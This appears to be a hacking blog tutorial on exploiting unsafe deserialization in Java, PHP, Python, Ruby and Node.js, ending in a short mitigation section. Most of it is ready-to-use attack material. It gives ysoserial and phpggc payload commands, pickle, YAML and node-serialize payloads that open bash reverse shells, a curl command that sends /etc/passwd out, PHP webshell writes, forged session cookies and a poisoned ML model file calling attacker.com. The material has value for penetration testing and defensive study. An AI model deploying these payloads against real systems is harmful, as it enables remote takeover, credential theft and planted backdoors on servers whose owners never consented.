JSON and YAML Unsafe Deserialization: Detection and Exploitation

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js — ysoserial chains, pickle RCE, phpggc POP chains, and magic bytes detection.

lazyhackers
Mar 27, 2026 · 20 min read

Serialization Fundamentals

Serialization converts an in-memory object graph into a byte stream or string that can be stored or transmitted. Deserialization reverses this process, reconstructing objects from the byte stream. The critical security issue: while reconstructing objects, the deserializer runs code (custom deserialization hooks, property setters, and lifecycle methods), and which classes and values that code runs on is decided entirely by the attacker-controlled input data.

The attack surface exists wherever serialized data crosses a trust boundary: HTTP cookies, API request bodies, message queue payloads, session stores, and inter-service RPC calls. The magic bytes of each format allow rapid identification during black-box testing.

| Language/Format | Magic Bytes (Hex) | Human-Readable Start | Common Location |
| Java Serialized | AC ED 00 05 | ¬í.. (mostly non-printable) | Cookies, HTTP body, JMX |
| Python Pickle | 80 02 (protocol 2), 80 04 (protocol 4) | Binary | Custom or legacy Flask sessions, ML models |
| PHP Serialized | N/A | O:9:"ClassName" | Cookies, POST body |
| Ruby Marshal | 04 08 | Binary | Rails sessions, cookies |
| Java Base64 | N/A | rO0AB | URL params, JSON fields |
| .NET ViewState | N/A | /wE (base64; typically /wEP, sometimes /wEy) | ASP.NET __VIEWSTATE |
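
The signatures in the table can be turned into a quick triage helper. The following is a minimal sketch, not a complete detector: the function names and returned labels are hypothetical, the `FF 01` ViewState prefix is simply what the `/wE` base64 prefix decodes to, and short prefixes such as `O:` will produce false positives on ordinary text.

```python
import base64
import binascii

# Raw byte prefixes from the table (FF 01 is the decoded form of "/wE").
RAW_SIGNATURES = [
    (b"\xac\xed\x00\x05", "java-serialized"),
    (b"\x80\x02", "python-pickle"),
    (b"\x80\x04", "python-pickle"),
    (b"\x04\x08", "ruby-marshal"),
    (b"\xff\x01", "dotnet-viewstate"),
    (b"O:", "php-serialized"),
]


def identify_raw(data: bytes):
    """Return a format label if data starts with a known signature, else None."""
    for prefix, label in RAW_SIGNATURES:
        if data.startswith(prefix):
            return label
    return None


def identify_serialization(value: str):
    """Check a cookie or parameter value as-is, then as base64 or base64url."""
    label = identify_raw(value.encode("latin-1", "ignore"))
    if label:
        return label
    # Normalise base64url to standard base64 and restore stripped padding.
    candidate = value.strip().replace("-", "+").replace("_", "/")
    candidate += "=" * (-len(candidate) % 4)
    try:
        decoded = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    return identify_raw(decoded)
```

Running every cookie and opaque parameter from the proxy history through `identify_serialization` gives a shortlist to test by hand; a `None` result only means none of these particular signatures matched.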

Java Deserialization — ysoserial and Gadget Chains

How Java Deserialization Works

Java's ObjectInputStream.readObject() reconstructs serialized objects by reading the class name and data from the stream. As it reconstructs each object, it invokes the private readObject() method on classes that define one, followed by hooks such as readResolve() and any registered validateObject() callbacks. Other methods (hashCode(), equals(), toString(), and later finalize() at garbage collection) fire as side effects of rebuilding collections or discarding objects. A gadget chain exploits the fact that some classes on the application's classpath perform dangerous operations (like executing shell commands or making network connections) within these methods.

# Detecting Java deserialization in HTTP traffic:
# Magic bytes AC ED 00 05 in raw body, or base64-encoded rO0AB...

# Burp Suite detection (in raw request):
# Cookie: session=rO0ABXNyAC5...  <-- base64 Java serialized object
# Body with Content-Type: application/octet-stream
# AMF binary protocol traffic

# Confirming the endpoint deserializes:
# 1. Decode the base64 cookie
echo "rO0ABXNy..." | base64 -d | xxd | head
# 0000000: aced 0005 7372 ...  <-- confirms AC ED 00 05

# 2. Generate DNS callback payload with ysoserial:
java -jar ysoserial.jar URLDNS "http://your-burp-collab.oastify.com" > payload.ser

# 3. Send the payload:
curl -X POST https://target.com/api/endpoint \
  --data-binary @payload.ser \
  -H "Content-Type: application/octet-stream"

# 4. Check Burp Collaborator for DNS hit
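
Beyond the magic bytes, the first class name in a captured stream often hints at what the application expects to receive. The sketch below assumes the most common layout only (stream header, then TC_OBJECT 0x73, TC_CLASSDESC 0x72, and a length-prefixed class name, which matches the `aced 0005 7372` dump above); the helper name `first_class_name` is hypothetical, and streams that start with another type code simply return None.

```python
import struct

STREAM_MAGIC = 0xACED   # first two bytes of every Java serialization stream
STREAM_VERSION = 5      # the 00 05 that follows the magic
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72


def first_class_name(stream: bytes):
    """Return the top-level class name of a Java serialized object, or None."""
    if len(stream) < 8:
        return None
    magic, version = struct.unpack(">HH", stream[:4])
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        return None
    # Only the common "new object with new class descriptor" layout is handled.
    if stream[4] != TC_OBJECT or stream[5] != TC_CLASSDESC:
        return None
    # The class name is stored as a 2-byte big-endian length plus UTF-8 bytes.
    (name_len,) = struct.unpack(">H", stream[6:8])
    name = stream[8:8 + name_len]
    if len(name) != name_len:
        return None  # truncated capture
    return name.decode("utf-8", "replace")
```

Feeding it the base64-decoded cookie bytes returns the class name when the layout matches, which helps decide whether the value is an application object worth replacing with a gadget payload.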

ysoserial Gadget Chains

ysoserial is the primary tool for generating Java deserialization payloads. Each gadget chain requires specific libraries to be present in the application's classpath:

# List all available gadget chains:
java -jar ysoserial.jar --help

# CommonsCollections1 — Apache Commons Collections 3.1-3.2.1
java -jar ysoserial.jar CommonsCollections1 'curl http://10.10.10.10:8080/rce' | base64 -w0

# CommonsCollections6 — works on newer Java (>8u71) where CC1/CC3 were patched
java -jar ysoserial.jar CommonsCollections6 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=}|{base64,-d}|bash' | base64 -w0

# Spring framework gadget:
java -jar ysoserial.jar Spring1 'touch /tmp/pwned' | base64 -w0

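# Hibernate gadget (very common in enterprise Java):
# Note: these chains run the command through Runtime.exec() without a shell, so >, | and && are not interpreted
java -jar ysoserial.jar Hibernate1 'touch /tmp/pwned' | base64 -w0

# Groovy gadget (for shell features, wrap the command as in the CommonsCollections6 example above):
java -jar ysoserial.jar Groovy1 'wget http://10.10.10.10/shell.sh -O /tmp/s' | base64 -w0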

# For cookie injection (base64url encoding, no padding):
java -jar ysoserial.jar CommonsCollections6 'id' | base64 -w0 | tr '+/' '-_' | tr -d '='
The CommonsCollections gadget chains are the most common because Apache Commons Collections ships with a large share of enterprise Java applications. In ysoserial, CC1, CC3, CC5, CC6, and CC7 target Commons Collections 3.1, while CC2 and CC4 target commons-collections4 4.0. Always try multiple chains since classpath availability varies.
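
Trying several chains by hand gets tedious, so the loop is easy to script. This is a minimal sketch under stated assumptions: `ysoserial.jar` sits in the working directory, the chain list is just the names used in this article, and the helper names `build_commands` and `cookie_safe` are hypothetical.

```python
import base64

# Chain names taken from the examples above; extend as needed.
CHAINS = [
    "CommonsCollections1",
    "CommonsCollections6",
    "Spring1",
    "Hibernate1",
    "Groovy1",
]


def build_commands(command, jar="ysoserial.jar"):
    """Return one argv list per chain, ready for subprocess.run()."""
    return [["java", "-jar", jar, chain, command] for chain in CHAINS]


def cookie_safe(payload: bytes) -> str:
    """Encode raw payload bytes as unpadded base64url for cookie injection."""
    return base64.urlsafe_b64encode(payload).rstrip(b"=").decode("ascii")
```

Each argv list can be passed to `subprocess.run(argv, capture_output=True)`, and the resulting `stdout` bytes handed to `cookie_safe()` before being sent to the target.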

Full Java Deserialization Exploit Chain

# Target: Java web application with session cookie
# Cookie observed: JSESSIONID=rO0ABXNyAC5qYXZhLnV0...

# Step 1: Extract and identify
echo "rO0ABXNy..." | base64 -d > session.bin
file session.bin
# Java serialization data

# Step 2: DNS callback to confirm blind RCE
java -jar ysoserial.jar CommonsCollections6 \
  'nslookup confirm.attackercollab.oastify.com' > blind_test.ser

curl -X POST https://target.com/api/process \
  -H "Content-Type: application/octet-stream" \
  --data-binary @blind_test.ser

# Wait for DNS hit in Collaborator

# Step 3: Out-of-band data exfiltration (if blind)
java -jar ysoserial.jar CommonsCollections6 \
  'curl -d @/etc/passwd http://10.10.10.10:8080/exfil' > exfil.ser

# Step 4: Reverse shell
# Encode reverse shell to avoid bad characters:
echo -n 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' | base64
# YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=

java -jar ysoserial.jar CommonsCollections6 \
  'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=}|{base64,-d}|bash' \
  > shell.ser

curl -X POST https://target.com/api/process \
  -H "Content-Type: application/octet-stream" \
  --data-binary @shell.ser
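
The brace-expansion wrapper used in Step 4 exists because Runtime.exec() splits the command on whitespace and never invokes a shell, so redirections and pipes in a plain command string are not interpreted. A small helper can build the wrapper for any command; the function name `wrap_for_runtime_exec` is hypothetical, and the sketch assumes bash and base64 are available on the target.

```python
import base64


def wrap_for_runtime_exec(command: str) -> str:
    """Wrap a shell command so it survives Runtime.exec() tokenisation.

    The command is base64-encoded (no spaces or metacharacters remain) and
    bash brace expansion rebuilds "echo <b64> | base64 -d | bash" on the target.
    """
    encoded = base64.b64encode(command.encode("utf-8")).decode("ascii")
    return "bash -c {echo,%s}|{base64,-d}|bash" % encoded
```

Calling `wrap_for_runtime_exec('bash -i >& /dev/tcp/10.10.10.10/4444 0>&1')` reproduces the string passed to ysoserial in Step 4.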

PHP Object Injection and POP Chains

PHP Serialization Format

PHP's serialize() function produces a string representation of objects. The unserialize() function reconstructs these objects and calls magic methods during the process:

// PHP serialized string format:
// O:9:"ClassName":2:{s:4:"prop";s:5:"value";s:5:"other";i:42;}
// O = Object, :9: = class name length, "ClassName" = class name
// :2: = number of properties
// s:4:"prop" = string key, s:5:"value" = string value

// Magic methods called during deserialization:
// __wakeup()  — called immediately after unserialize()
// __destruct() — called when object is garbage collected (end of request)
// __toString() — called when object is used as string
// __get()     — called when accessing undefined property

// Example vulnerable code:
class FileLogger {
  public $logFile = '/var/log/app.log';
  public $logData;

  public function __destruct() {
    // Called at end of request — attacker controls $logFile and $logData!
    file_put_contents($this->logFile, $this->logData);
  }
}

// If user-supplied cookie is passed to unserialize():
$data = unserialize(base64_decode($_COOKIE['session']));

// Attack payload — write a PHP webshell:
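// O:10:"FileLogger":2:{s:7:"logFile";s:23:"/var/www/html/shell.php";s:7:"logData";s:29:"";}
// Each s:N prefix must equal the byte length of its string (the 29-byte PHP body of logData is omitted here)
// Base64-encoded and set as cookie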
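
Hand-writing serialized strings is error-prone because unserialize() rejects the input if any length prefix is off by even one byte. The sketch below builds the format described above for public string and integer properties only; the function names are hypothetical, and private or protected properties (which carry NUL-prefixed names) are deliberately not handled.

```python
def php_string(value: str) -> str:
    """Serialize a string; the prefix is the length in bytes, not characters."""
    return 's:%d:"%s";' % (len(value.encode("utf-8")), value)


def php_value(value) -> str:
    """Serialize a supported scalar (str or int)."""
    if isinstance(value, bool):
        raise TypeError("bool is not handled in this sketch")
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return php_string(value)
    raise TypeError("unsupported type: %r" % type(value))


def php_object(class_name: str, props: dict) -> str:
    """Serialize an object with public properties in insertion order."""
    body = "".join(php_string(k) + php_value(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (
        len(class_name.encode("utf-8")), class_name, len(props), body)
```

For example, `php_object("FileLogger", {"logFile": "/var/www/html/shell.php"})` yields a string whose class-name and path lengths are computed rather than typed by hand.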

Building POP Chains with phpggc

phpggc (PHP Generic Gadget Chains) is the PHP equivalent of ysoserial, providing pre-built gadget chains for popular PHP frameworks:

# List available gadget chains:
./phpggc -l

# Chains for common frameworks:
# Laravel/RCE1 through RCE7
# Symfony/RCE1 through RCE7
# Guzzle/FW1 (file write)
# Monolog/RCE1 (log injection)
# Yii/RCE1 (Yii framework)

# Generate Laravel RCE payload:
./phpggc Laravel/RCE5 system 'id' -b
# Output: base64-encoded serialized payload

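# File write payload (write webshell):
# File-write chains take <remote_path> <local_path>: the contents of the local file are written to the remote path
# (run ./phpggc -i <chain> to confirm the parameters of a given chain)
./phpggc Laravel/FW1 /var/www/html/backdoor.php ./backdoor.php -b

# Guzzle file write (common in APIs using Guzzle HTTP client):
./phpggc Guzzle/FW1 /var/www/html/shell.php ./shell.php -b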

# Symfony RCE:
./phpggc Symfony/RCE4 exec 'curl http://10.10.10.10/$(id)' -b

# Monolog RCE (very common — Monolog is used in Laravel, Symfony):
./phpggc Monolog/RCE1 system 'id' -b

# With URL encoding for cookie injection:
./phpggc Laravel/RCE5 system 'id' -b | python3 -c "import sys,urllib.parse; print(urllib.parse.quote(sys.stdin.read().strip()))"

Finding PHP Deserialization Points

# In source code, look for:
grep -rn "unserialize(" /var/www/html/
grep -rn "unserialize(base64_decode" /var/www/html/
grep -rn "unserialize(\$_COOKIE" /var/www/html/
grep -rn "unserialize(\$_GET" /var/www/html/
grep -rn "unserialize(\$_POST" /var/www/html/

# Common locations in HTTP traffic:
# Cookies with base64-encoded values starting with "Tzo" (decodes to "O:")
# Hidden form fields
# API request bodies with base64 blobs
# ViewState-like parameters

# Identifying PHP serialized data:
# Plain: O:8:"stdClass":1:{s:4:"test";s:2:"ok";}
# Base64: TzoxMDoiRmlsZUxvZ2dlciI6...
# URL-encoded: O%3A10%3A%22FileLogger%22...
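
The three encodings listed above can be checked in one pass. This is a rough sketch rather than a parser: the regular expression only recognises the start of a serialized object or array, the function name is hypothetical, and truncated values (such as a cookie cut off mid-string) will not match.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Start of a serialized object (O:<len>:"Class":<n>:{) or array (a:<n>:{).
PHP_PATTERN = re.compile(r'^(?:O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{|a:\d+:\{)')


def looks_like_php_serialized(value: str) -> bool:
    """Test a value as plain text, URL-decoded text, and base64 of either."""
    candidates = [value, unquote(value)]
    for text in list(candidates):
        padded = text + "=" * (-len(text) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue
        candidates.append(decoded.decode("latin-1"))
    return any(PHP_PATTERN.match(c) for c in candidates)
```

A match is only a reason to look closer; whether the value ever reaches unserialize() still has to be confirmed against the application.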

Python Pickle Deserialization RCE

Python's pickle module is the most dangerous deserialization format because executing arbitrary code is literally by design — the __reduce__ method tells pickle exactly how to reconstruct an object, including calling any Python callable with any arguments:

import pickle
import os

# How a malicious pickle payload is constructed:
class MaliciousPickle:
    def __reduce__(self):
        # Return a tuple: (callable, args)
        # Pickle will call callable(*args) during deserialization
        return (os.system, ('curl http://10.10.10.10:8080/rce &',))

# Serialize it:
payload = pickle.dumps(MaliciousPickle())
print(payload)
# b'\x80\x04\x95...' — binary pickle data

# Reverse shell through os.system:
class RCEPickle:
    def __reduce__(self):
        cmd = "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
        return (os.system, (cmd,))

# Even more flexible: using subprocess
import subprocess
class SubprocessPickle:
    def __reduce__(self):
        return (subprocess.check_output, (['id'],))

# Generating the payload for HTTP delivery:
import base64
payload = base64.b64encode(pickle.dumps(RCEPickle())).decode()
print(payload)  # Send this as a cookie or API parameter
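
A pickle can be inspected without executing it, which is useful both for confirming what a captured blob would import and for reviewing generated payloads. The sketch below uses the standard-library pickletools module; the function name `referenced_globals` is hypothetical, and the STACK_GLOBAL handling is a heuristic that assumes the module and attribute names are the two most recent string literals in the stream (a hand-crafted pickle can defeat it).

```python
import pickle
import pickletools

# Opcodes that push a text string onto the pickle VM stack.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def referenced_globals(data: bytes):
    """List (module, name) pairs a pickle would import, without loading it."""
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name" joined by a space.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+: module and name were pushed as strings just before.
            found.append((recent_strings[-2], recent_strings[-1]))
    return found
```

Any result that references modules such as os, posix, subprocess, or builtins functions like exec is a strong sign that the blob is a payload rather than data.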

Pickle in Real Applications

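# Flask session pickle (older versions / custom session handling):
# If the app pickles its session data:
import base64
import hashlib
import hmac
import pickle
import zlib

def create_evil_flask_session(secret_key, payload_class):
    """Create a malicious session cookie for an app that pickles sessions.

    The "<payload>.<signature>" layout is illustrative only; the target's
    real cookie format and signing scheme must be matched exactly.
    """
    data = pickle.dumps(payload_class())
    compressed = zlib.compress(data)
    b64 = base64.urlsafe_b64encode(compressed)
    # Signing with HMAC-SHA1 needs the secret key (bytes)
    # Without the secret key, focus on finding the key first
    sig = hmac.new(secret_key, b64, hashlib.sha1).hexdigest()
    return b64.decode() + "." + sig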

# ML model files (critical infrastructure attack vector):
# joblib.load(), pickle.load() on ML model files is common
# Malicious .pkl file uploaded as "model update"
class MaliciousModel:
    def __reduce__(self):
        return (exec, ("import os; os.system('curl http://attacker.com/ml-pwn')",))

# Save as model.pkl and upload to ML pipeline:
with open('malicious_model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)

# Detecting pickle deserialization in Python apps:
# grep -rn "pickle.loads" /app/
# grep -rn "pickle.load(" /app/
# grep -rn "joblib.load" /app/
# Look for cookie values starting with \x80\x02 or \x80\x04 (base64: gAJ or gASV)

YAML Deserialization Attacks

PyYAML — load() vs safe_load()

# PyYAML's yaml.load() with Loader=yaml.Loader or yaml.UnsafeLoader (or with no
# Loader argument before PyYAML 5.1) allows arbitrary Python object construction via YAML tags

# Malicious YAML payload for RCE:
yaml_payload = """
!!python/object/apply:subprocess.check_output
- ['id']
"""

# With yaml.load():
import yaml
result = yaml.load(yaml_payload, Loader=yaml.Loader)  # EXECUTES id command!

# More powerful payload using os.system:
yaml_payload_rce = """
!!python/object/apply:os.system
- 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"'
"""

# Code execution via python/object/new (the technique behind the FullLoader bypass reported as CVE-2020-1747); runs id:
yaml_complex = """
!!python/object/new:type
  args:
  - z
  - !!python/tuple []
  - {'extend': !!python/name:exec }
  listitems: "import os; os.system('id')"
"""

# Detection in source code:
# grep -rn "yaml.load(" /app/
# Safe version: yaml.safe_load(), which only constructs basic YAML types (strings, numbers, lists, dicts)
# Vulnerable: yaml.load(data) before PyYAML 5.1, Loader=yaml.Loader/UnsafeLoader in any version, and Loader=yaml.FullLoader before PyYAML 5.4
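
When reviewing captured YAML or log files, language-specific tags are the quickest tell. The following sketch flags them with a regular expression; it is a triage aid under stated assumptions, not a defence: the function name is hypothetical, only the `!!python/` and `!ruby/` shorthand forms are covered, and verbatim tag syntax such as `!<tag:yaml.org,2002:python/...>` would slip past it. The actual fix remains a safe loader.

```python
import re

# Shorthand tags that ask the parser to build language-specific objects.
LANGUAGE_TAG = re.compile(r"!!python/\S+|!ruby/\S+")


def find_language_tags(document: str):
    """Return every Python- or Ruby-specific tag found in a YAML document."""
    return LANGUAGE_TAG.findall(document)
```

For instance, the first payload in this section yields `['!!python/object/apply:subprocess.check_output']`, while ordinary configuration files return an empty list.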

Ruby YAML and Marshal Deserialization

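# Ruby Marshal: binary serialization format
# Older Rails versions used Marshal for session cookies (signed with the app secret, secret_key_base in Rails 4+); Rails 4.1+ defaults to JSON for new apps
# If secret_key_base is known/leaked, an attacker can sign a malicious Marshal session.

# Ruby YAML deserialization:
# CVE-2013-0156 was the famous 2013 Rails RCE (YAML embedded in XML request parameters).
# The payload below is a later "universal" YAML.load gadget chain built from RubyGems and net/http classes: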
yaml_rce = <<~YAML
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::Package::TarReader
  io: &1 !ruby/object:Net::BufferedIO
    io: &1 !ruby/object:Gem::Package::TarReader::Entry
      read: 0
      header: "abc"
    debug_output: &1 !ruby/object:Net::WriteAdapter
      socket: &1 !ruby/object:Gem::RequestSet
          sets: !ruby/object:Net::WriteAdapter
              socket: !ruby/module 'Kernel'
              method_id: :system
          git_set: "id"
      method_id: :resolve
YAML

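# ERB as a gadget:
# YAML.load can instantiate an ERB object with an attacker-chosen template, but the template
# only runs when something later calls #result on it, so ERB needs a second gadget to fire.
require 'yaml'
require 'erb'

payload = "---\n- !ruby/object:ERB\n  src: \"<%=`id`%>\"\n"
YAML.load(payload)  # Builds the ERB object on Psych < 4; Psych 4+ (Ruby 3.1+) rejects the tag unless YAML.unsafe_load is used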

node-serialize — Node.js Deserialization RCE

The node-serialize npm package (version 0.0.4) contains a critical vulnerability where JavaScript function expressions stored in serialized data are executed via eval() during deserialization:

// node-serialize vulnerability (CVE-2017-5941)
// The serialize() function includes a special marker _$$ND_FUNC$$_ for functions
// During unserialize(), any value starting with this marker is eval()'d

// Malicious payload structure:
{
  "rce": "_$$ND_FUNC$$_function(){require('child_process').exec('id', function(error, stdout, stderr){console.log(stdout)});}()"
}

// Note the IIFE syntax () at the end — this forces immediate execution
// Without (), the function is defined but not called

// Full exploit:
const serialize = require('node-serialize');

// Create payload
const payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'bash -c \\"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\\"\', function(e,s,r){console.log(s)})}()"}';

// If the application does:
const obj = serialize.unserialize(payload); // TRIGGERS RCE

// Finding this vulnerability:
// Look for: require('node-serialize')
// Look for: .unserialize( or serialize.unserialize(
// Common in: session handling, cookie parsing, data transfer between services

// Generating payload with nodejsshell.py:
python nodejsshell.py 10.10.10.10 4444
// Output: eval(String.fromCharCode(10,118,97,114,...))
// Wrap in: {"rce":"_$$ND_FUNC$$_function(){ PAYLOAD }()"}
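
Because unserialize() runs the input through JSON.parse() first, the payload has to be valid JSON, and hand-escaping nested quotes is the usual point of failure. Letting a JSON encoder do the escaping avoids that. A minimal sketch, with the function name `build_payload` and the default key `rce` chosen here for illustration:

```python
import json

# Marker that node-serialize treats as "this value is a function".
MARKER = "_$$ND_FUNC$$_"


def build_payload(js_body: str, key: str = "rce") -> str:
    """Wrap JavaScript in an immediately invoked function and JSON-encode it."""
    value = MARKER + "function(){" + js_body + "}()"
    # json.dumps escapes quotes and backslashes so JSON.parse accepts the result.
    return json.dumps({key: value})
```

The returned string can be base64-encoded or placed in a cookie as-is, depending on how the target transports its serialized data.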

Finding Deserialization in HTTP Traffic

Burp Suite Detection Methodology

# Step 1: Set up Burp Collaborator
# Burp Suite Professional > Burp Collaborator > Copy to clipboard
# Your collaborator: abcdef123.oastify.com

# Step 2: Check all cookies for serialized data signatures
# In Burp: Proxy > HTTP History
# Look for base64 cookies, binary cookies, long opaque values

# Step 3: Test each suspicious parameter with URLDNS payload
# Java:
java -jar ysoserial.jar URLDNS "http://$(openssl rand -hex 4).abcdef123.oastify.com" > dns_test.ser
# Base64 encode and inject into cookie

# Step 4: Check Collaborator for DNS hits
# If DNS hit received: Java deserialization confirmed

# For PHP cookies — look for:
# base64 strings starting with: Tzo (O: when decoded)
# URL-encoded strings: O%3A

# For Python pickle:
# Cookies/params with binary data or base64 starting with gASV or gAJ

# Burp extension: Java Deserialization Scanner
# Automatically tests for deserialization vulnerabilities using multiple gadget chains
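
When many parameters are tested at once, a unique subdomain per injection point makes it possible to tell which one triggered a DNS hit, which is what the `openssl rand -hex 4` prefix in Step 3 achieves. A small sketch of the same idea; the function name and the injection-point labels are hypothetical.

```python
import secrets


def tagged_hosts(injection_points, collaborator_domain):
    """Map a unique callback hostname to each injection point under test."""
    mapping = {}
    for point in injection_points:
        tag = secrets.token_hex(4)  # 8 hex characters, like openssl rand -hex 4
        mapping[tag + "." + collaborator_domain] = point
    return mapping
```

Each hostname goes into one URLDNS payload; when Collaborator reports a lookup, the mapping identifies the cookie or parameter that was deserialized.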

Identifying Deserialization in Non-obvious Locations

# AMF (Action Message Format): Flash/Flex applications
# Binary protocol with its own encoding; Java AMF libraries map messages onto Java objects and can reach Java deserialization for externalizable types
# Content-Type: application/x-amf

# ViewState — ASP.NET
# Hidden form field: __VIEWSTATE
# Base64 starting with /wE (typically /wEP; /wEy indicates an embedded binary-serialized object)
# If not MAC-protected (EnableViewStateMac=false): directly exploitable
# With known machineKey: forge malicious viewstate

# JMX (Java Management eXtensions) — internal monitoring
# Port 1099 (RMI registry)
# nmap -p 1099 --script rmi-dumpregistry target
# Use ysoserial with RMI transport:
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit target 1099 CommonsCollections6 'id'

# Deserialization in message queues:
# Apache ActiveMQ (CVE-2023-46604, critical RCE):
# A crafted OpenWire message makes the broker instantiate ClassPathXmlApplicationContext with an attacker-hosted Spring XML URL
python exploit_activemq.py -i target -p 61616 -u http://attacker.com/poc.xml

# Apache Kafka — custom deserializers may use Java serialization
# RabbitMQ — custom message converters

# HTTP headers:
# X-Java-Serialized-Object: base64data
# X-Auth-Token: rO0AB... (Java serialized token)

Blind Deserialization Detection with Collaborator

# For blind scenarios where you don't see output:
# Use out-of-band channels: DNS, HTTP callbacks, time delays

# Java — URLDNS gadget (works without any specific classpath dependency):
java -jar ysoserial.jar URLDNS "http://java-deser-test.YOUR_COLLAB.oastify.com" | base64 -w0

# Python pickle — DNS callback:
import pickle, base64
class DNSCallback:
    def __reduce__(self):
        import socket
        return (socket.gethostbyname, ('python-pickle-test.YOUR_COLLAB.oastify.com',))

payload = base64.b64encode(pickle.dumps(DNSCallback())).decode()

# PHP — using file_get_contents for SSRF callback:
# Build POP chain that calls file_get_contents('http://YOUR_COLLAB.oastify.com/php-deser')

# Time-based detection (when DNS is blocked):
# Python pickle: sleep payload (os.system blocks until the command exits):
import os
class TimingGadget:
    def __reduce__(self):
        return (os.system, ('sleep 10',))
# If response is delayed by ~10 seconds: deserialization confirmed
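
Timing checks are only convincing when compared against a baseline, since slow endpoints produce false positives. The sketch below keeps the HTTP details out of scope: `send_baseline` and `send_payload` are hypothetical callables supplied by the tester (for example, thin wrappers around an HTTP client), and the 0.8 threshold is an arbitrary choice.

```python
import time


def timed(send):
    """Return how long one call to send() takes, in seconds."""
    start = time.monotonic()
    send()
    return time.monotonic() - start


def looks_delayed(send_baseline, send_payload, delay, samples=3, threshold=0.8):
    """Compare a payload request against the slowest of several baselines.

    Returns True when the payload request took at least threshold * delay
    seconds longer than the worst baseline sample.
    """
    baseline = max(timed(send_baseline) for _ in range(samples))
    observed = timed(send_payload)
    return observed - baseline >= delay * threshold
```

Repeating the check a few times with different delay values (5, 10, 15 seconds) and seeing the response time track the value is stronger evidence than a single slow response.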

Mitigation Strategies

| Language | Vulnerable Function | Safe Alternative | Additional Controls |
| Java | ObjectInputStream.readObject() | JSON (Jackson/Gson) with type restrictions | SerialKiller filter, Java Agent |
| PHP | unserialize() | json_decode() with type checking | allowed_classes parameter |
| Python | pickle.loads() | json.loads(), marshmallow | RestrictedUnpickler class |
| Ruby | Marshal.load(), YAML.load() | JSON.parse(), YAML.safe_load() | Psych safe_load_file |
| Node.js | node-serialize | JSON.parse() with schema validation | Remove node-serialize entirely |
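
The RestrictedUnpickler entry in the table refers to the pattern from the Python documentation: subclass pickle.Unpickler and override find_class() so that only an explicit allow list of globals can be resolved. A minimal sketch, in which the allow list contents and the helper name `restricted_loads` are choices made here for illustration:

```python
import builtins
import io
import pickle

# Only these harmless builtins may be resolved during unpickling.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        """Resolve allow-listed builtins and refuse every other global."""
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allow list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers and scalars still load, while any payload built on `__reduce__` with os.system, subprocess, or exec fails with UnpicklingError. This narrows the attack surface but is not a substitute for moving untrusted input to a data-only format such as JSON.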

Java SerialKiller Filter

// Drop-in replacement for ObjectInputStream that whitelists/blacklists classes:
// https://github.com/ikkisoft/SerialKiller

import org.nibblesec.tools.SerialKiller;

// Replace:
ObjectInputStream ois = new ObjectInputStream(inputStream);

// With:
ObjectInputStream ois = new SerialKiller(inputStream, "/path/to/serialkiller.conf");

// serialkiller.conf:
<serialkiller>
  <whitelist>
    <regexps>
      <regexp>com\.example\.myapp\.[a-zA-Z0-9]*</regexp>
      <regexp>java\.lang\.(Boolean|Integer|String)</regexp>
    </regexps>
  </whitelist>
  <blacklist>
    <regexps>
      <regexp>org\.apache\.commons\.collections\.functors\.InvokerTransformer</regexp>
    </regexps>
  </blacklist>
</serialkiller>

PHP — unserialize() with allowed_classes

<?php
// PHP 7.0+: restrict which classes can be unserialized
$data = unserialize($untrusted_data, ['allowed_classes' => false]);
// allowed_classes: false = no classes, only primitives
// allowed_classes: ['MyClass', 'AnotherClass'] = whitelist specific classes

// Better: use JSON entirely and avoid unserialize()
$data = json_decode($untrusted_data, true);
if (json_last_error() !== JSON_ERROR_NONE) {
    throw new InvalidArgumentException('Invalid JSON');
}
Avoid unserialize() on user-supplied data in PHP, even with allowed_classes: every class you allow still runs its magic methods on attacker-controlled properties. The safest approach is to redesign the feature around JSON or another schema-validated format.

Insecure deserialization remains one of the most critical vulnerability classes because exploitation is often straightforward (send pre-built payload, receive shell) and the attack surface is wide — session cookies, API bodies, message queues, and internal microservice communication all commonly use serialization. The combination of ysoserial, phpggc, and pickle payloads means a skilled attacker needs only to identify the deserialization point and select the appropriate tool.
